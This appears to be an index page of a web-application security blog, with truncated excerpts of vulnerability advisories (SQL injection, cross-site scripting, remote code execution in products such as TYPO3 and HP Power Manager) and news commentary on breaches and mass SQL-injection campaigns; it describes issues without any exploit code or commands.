-
1) HP Power Manager Management Web Server Login Remote Code Execution Vulnerability HP Power Manager is susceptible to a remote code execution vulnerability via the login form of the web based management web server due to improper bounds-checking of user-supplied data. Exploitation of this vulnerability...
-
1) TYPO3 Core Multiple Vulnerabilities TYPO3 is susceptible to multiple remote vulnerabilities including SQL-injection, Cross-Site Scripting, information disclosure, frame and session hijacking, and shell-command-execution issues. Each of these issues is exploitable via a browser, although some might...
-
1) Novell GroupWise WebAccess Cross-Site Scripting Vulnerability Novell GroupWise WebAccess is susceptible to a Cross-Site Scripting vulnerability. An attacker can leverage this vulnerability to execute script code in the browser of an unsuspecting user in context of the affected application, possibly...
-
New studies have gone a long way in confirming that certain web application security trends are accelerating. The SANS Top Cyber Security Risks report reveals that a full 60% of Internet attacks are now conducted against web applications. It's no longer unpatched operating systems that provide attackers...
-
1) Ruby on Rails Form Helpers Unicode String Handling Cross-Site Scripting Vulnerability Ruby on Rails is susceptible to a Cross-Site Scripting vulnerability. An attacker can leverage Cross-Site Scripting to execute script code in the browsers of unsuspecting users in context of the affected application...
-
Court papers recently filed in conjunction with the indictment of Albert Gonzalez reveal that SQL Injection attacks were behind the data breach that allowed hackers to steal massive amounts of data from Heartland Payment Systems, TJX, and other businesses. Over 130 million credit and debit card numbers...
-
1) Oracle Config Management Multiple SQL-injection Vulnerabilities Oracle Config Management is susceptible to multiple SQL Injection vulnerabilities. SQL Injection can give an attacker full access to a backend database, and in certain circumstances can be utilized to take complete control of a system...
-
1) Sun Java System Web Server Reverse Proxy Plug-in Cross-Site Scripting Vulnerability Sun Java System Web Server is susceptible to a Cross-Site Scripting vulnerability. If successful, Cross-Site Scripting can be exploited to manipulate or steal cookies, create requests that can be mistaken for those...
-
1) Multiple Symantec Products Log Viewer Script Injection Vulnerabilities Multiple Symantec Products are susceptible to browser-exploitable script injection vulnerabilities due to improper sanitization of user-supplied input used in dynamically created content. Successful exploitation would give an attacker...
-
Paris Hilton’s website was infected with some pretty nasty malware over the past weekend. ScanSafe (who discovered the compromise) said that over 15,000 sites were detected to have this malware installed, including an ad on MLB.com. So far, most AV products aren't stopping it, either. Visitors to...
-
This week saw the release of the “ Top 25 Most Dangerous Programming Errors ” list from MITRE and SANS. At first skim, I nearly discarded it as just an effort to pad resumes—after all, do we really need another “top X” list (every group with a barely pronounceable acronym has their own)? Weighing heavily...
-
Web application security is a hot topic, no doubting that these days. The awareness is growing and developers are starting to take notice of the security shortfalls in their code. Awareness of attacks like SQL injection, cross-site scripting, and CSRF (Cross-Site Request Forgery) is starting to spread...
-
Not every company has consumer data contained within the web applications. I get that. Logic fails me, however, when someone tries to explain to me why because they don't have consumer data (or other critical data that can be "stolen" from their applications) they really don't need...
-
You have likely been tracking the mass SQL Injections that are currently sweeping through the net. Just last night I was shopping on www.ihomeaudio.com when I noticed they had been injected (they have since fixed their site). HP started to observe these attacks in January. They spread to over 500,000...